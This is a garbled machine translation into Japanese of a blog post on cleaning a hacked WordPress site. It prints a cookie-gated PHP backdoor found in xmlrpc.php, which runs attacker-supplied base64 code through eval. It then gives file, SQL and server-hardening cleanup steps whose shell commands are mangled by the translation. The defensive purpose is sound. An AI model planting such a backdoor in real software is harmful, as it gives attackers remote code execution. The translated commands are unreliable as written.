あなたがこの記事を読む前に、あなたが表示されるはずです ここに投稿、何かを理解するために。 :)
私はそれを上のいくつかのブログファイルで見つけました stealthsettings.com、ウイルス感染の結果として表示された以下のようなコード の偉業 WordPress.:
si
<?php if($_COOKIE[’44e827f9fbeca184′]==”5cd3c94b4b1c57ea”){ eval(base64_decode($_POST[‘file’])); exit; } ?>
上記のケースでは、ファイルについてです xmlrpc.php から 眠いですしかし、時 grep サーバーは、ソース内のこの種の非常に多くのコードのように見えます。
感染ファイルのクリーニング:
Ooookkkk ...
1。 最良の解決策は、それが行われた後に バックアップCPCと清掃データベースがにあります ワイプ ファイル WordPress (wp-config.phpと、wpプラットフォームに厳密に関連していないファイルは、注意深くチェックした後、保持できます)サーバーから、バージョンから元のファイルをアップロードします。 2.5.1 (この際:)アップグレードバージョンのWPを作ります) http://wordpress.org/download/ 。 あなたはそれらを慎重に確認することができます自信を持っている場合は、テーマを含むファイルを削除します。
ファイルが影響を受けたとブログで以前に使用し、簡単にテーマを変えていないテーマは、この問題を解決しないことは明らかです。
./andreea/wp-content/主題/default/index.php:
2。 含むすべてのファイルを検索し、削除します。* _new.php、_old.php * * .jpgg、.giff * * .pnggとファイルのwp-INFO.TXT、もしあれば。
見つける。 -名前「* _new.php」
見つける。 -名前「* _old.php」
見つける。 -名前「* .jpgg」
見つける。 -名前「* _giff」
見つける。 -名前「* _pngg」
見つける。 -名前「wp-info.txt」
3。 で / tmpに 、のようなフォルダを検索し、削除します tmpYwbzT2
クリーニングSQL :
1。 テーブル内のテーブル wp_options 行が消去場合は以下を参照してください。 internal_links_cache, rss_f541b3abd05e7962fcab37737f40fad8 si wordpress_options.
2.すべてwp_options、に移動します active_plugins そして、拡張子* _new.php、_old.php * * .jpggのいずれかで終わるのプラグインがある場合、.giff * * .pnggを拭くか、別の拡張疑わしい場合は、慎重に確認してください。
3。 テーブル wp_users彼の右カラムには何も書かれていないユーザが存在する場合、参照してください。 user_nicename。 このユーザーを削除しますが、ID列の番号を覚えておいてください。 このユーザーは「WordPress" お気に入り USER_LOGIN それが作成され、00に表示されます。00:00 0000-00-00。
4。 表に移動します wp_usermeta 上記のIDに属するすべての行を削除します。
このsqlクリーンアップを実行した後、プラグインを無効にしてからアクティブにします。 (ブログ->ダッシュボード->プラグイン)
セキュアサーバー:
1。 「何であるかのディレクトリとファイルを参照してください。書き込み可能な"(chmod 777) を入れてみてください chmod これにより、どのレベルでも書き込みが許可されなくなります。 (chmod 例: 644)
見つけます。 許可します-2 -ls
2。 ビットセットを持っているもののファイルを参照してください。 SUID または SGID 。 あなたはそれらの上にこれらのファイルの場所を使用していない場合 chmod 0 またはそれに含まれるパッケージをアンインストールします。 彼らは実行権限をので、彼らは非常に危険です」グループヘッド「OR」ルート"ではなく、ファイルを実行しているユーザーの通常の権限を持ちます。
-ls許可します-04000 F見つける/ -type
-ls許可します-02000 F見つける/ -type
3。 開いているポートを確認し、閉じるために、またはそれらは使用されません確保してみてください。
netstatの-an | -iを聞くのgrep
そんなに。 私が参照してください。 いくつかのブログは禁止されています de Google Search 他の人は「彼はうまくやった!!!」と言います。 。 まあ、私は彼らのためにそうしたでしょう...でも、Googleが禁止し始めたらどうしますか 全てのサイト 形成 SE SPAM タックトロイの木馬(Trojan.Clicker.HTML)クッキーで?
1についての考えWordPress エクスプロイト – ウイルス ファイルのクリーニング、SQL およびサーバーのセキュリティ。」